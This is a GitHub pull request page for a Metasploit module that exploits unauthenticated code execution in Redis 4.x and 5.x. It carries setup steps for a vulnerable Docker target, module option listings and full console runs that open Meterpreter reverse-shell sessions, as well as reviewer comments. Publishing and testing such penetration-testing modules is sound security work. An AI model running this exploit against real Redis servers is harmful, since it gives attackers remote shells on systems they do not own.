Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module Redis Unauthenticated Code Execution #12107

Merged
merged 3 commits into from
Jul 29, 2019
Merged

Add module Redis Unauthenticated Code Execution #12107

merged 3 commits into from
Jul 29, 2019

Conversation

Green-m
Copy link
Contributor

@Green-m Green-m commented Jul 19, 2019

Description

This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x

Vulnerable Application

Vulnerable Application Link

  • Official Docker Images

https://hub.docker.com/_/redis/

Vulnerable Application Installation Setup.

docker pull redis
docker run -p 6379:6379 -d --name redis_slave redis

Options

  • CUSTOM

IF CUSTOM set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable.
It's only worked on linux system.

For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the pre-compiled redis module to accomplish this exploit.

Verification Steps

set CUSTOM true (available only on linux)

msf5 exploit(multi/redis/redis_unanth_rce) > options

Module options (exploit/multi/redis/redis_unanth_rce):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.17.0.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
   LPORT  8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false
verbose => false
msf5 exploit(multi/redis/redis_unanth_rce) > exploit

[*] Started reverse TCP handler on 172.17.0.1:8080 
[*] 127.0.0.1:6379        - Compile redis module extension file
[+] 127.0.0.1:6379        - Payload  generate successful! 
[*] 127.0.0.1:6379        - Listening on 172.17.0.1:6666
[*] 127.0.0.1:6379        - Rogue server close...
[*] 127.0.0.1:6379        - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400
[!] 127.0.0.1:6379        - This exploit may require manual cleanup of './vxwqrg.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter >

Set CUSTOM false (available on all system)

msf5 > use exploit/linux/redis/redis_unauth_exec
msf5 exploit(linux/redis/redis_unauth_exec) > options

Module options (exploit/linux/redis/redis_unauth_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    false            yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6379             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226
rhosts => 172.16.6.226
msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1
srvhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666
srvport => 6666
msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1
lhost => 172.16.6.1
msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999
lport => 9999
msf5 exploit(linux/redis/redis_unauth_exec) > options

Module options (exploit/linux/redis/redis_unauth_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CUSTOM    true             yes       Whether compile payload file during exploiting
   PASSWORD  foobared         no        Redis password for authentication test
   RHOSTS    172.16.6.226     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port (TCP)
   SRVHOST   172.16.6.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   6666             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.6.1       yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(linux/redis/redis_unauth_exec) > exploit

[*] Started reverse TCP handler on 172.16.6.1:9999
[*] 172.16.6.226:6379     - Listening on 172.16.6.1:6666
[*] 172.16.6.226:6379     - Rogue server close...
[*] 172.16.6.226:6379     - Sending command to trigger payload.
[*] Sending stage (3021284 bytes) to 172.16.6.226
[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800
[*] 172.16.6.226:6379     - Command Stager progress - 100.00% done (819/819 bytes)
[!] 172.16.6.226:6379     - This exploit may require manual cleanup of './wfuujx.so' on the target

meterpreter > getuid
Server username: uid=999, gid=999, euid=999, egid=999
meterpreter > getpid
Current pid: 173

@Green-m
Add redis rce module and data stuff.
b6697f5 
To do:
1. Check env of system and compiler.
2. Add a compiled so file to be compatible with windows and mac.
3. Add doc.
@Green-m
Add doc and enhance the module.
07f3c07
@Green-m Green-m added the module label Jul 19, 2019
Green-m
Green-m commented Jul 19, 2019
View reviewed changes
modules/exploits/linux/redis/redis_unauth_exec.rb
Rex.sleep(2)
register_file_for_cleanup("./#{module_file}")
#redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
#redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Please take note this cleanup, I commented the last two Redis commands, for it's always failed.
The reason is once a new session started, the Redis would get blocked and give no response to any request, which leads the command for cleanup to always failed.

To clean it successfully, we have to wait for the session ends. Actually, I did not know how to do it. :-(

@Green-m Green-m added the docs label Jul 19, 2019
@Green-m Green-m mentioned this pull request Jul 19, 2019
Closed
6 tasks
@ccondon-r7
Copy link
Contributor

Hey, @Green-m! Haven't seen you in the Framework PR queue in a while, welcome back :)

@Green-m
Copy link
Contributor Author

Green-m commented Jul 22, 2019

@ccondon-r7 Nice to see you again!

@wchen-r7 wchen-r7 self-assigned this Jul 26, 2019
@wchen-r7
Copy link
Contributor

I'm currently working on this pull request. Thanks for the patience!

@wchen-r7 wchen-r7 merged commit e71b92a into rapid7:master Jul 29, 2019
wchen-r7 added a commit that referenced this pull request Jul 29, 2019
@wchen-r7
Land #12107, Add module Redis Unauthenticated Code Execution
c47caec
@wchen-r7
Copy link
Contributor

Another excellent module from @Green-m. Thanks for waiting.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Jul 29, 2019
edited by tdoan-r7
Loading

Release Notes

The redis_unanth_rce module has been added to the framework. It exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x.

msjenkins-r7 pushed a commit that referenced this pull request Jul 29, 2019
@wchen-r7 @msjenkins-r7
Land #12107, Add module Redis Unauthenticated Code Execution
fa58b44
@Green-m Green-m deleted the redis_rce branch July 29, 2019 02:59
@tdoan-r7 tdoan-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 7, 2019
@Green-m Green-m mentioned this pull request Dec 10, 2019
Merged
@danielguardicore danielguardicore mentioned this pull request Mar 26, 2020
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu left review comments

Assignees

@wchen-r7 wchen-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@Green-m @ccondon-r7 @wchen-r7 @wvu @tdoan-r7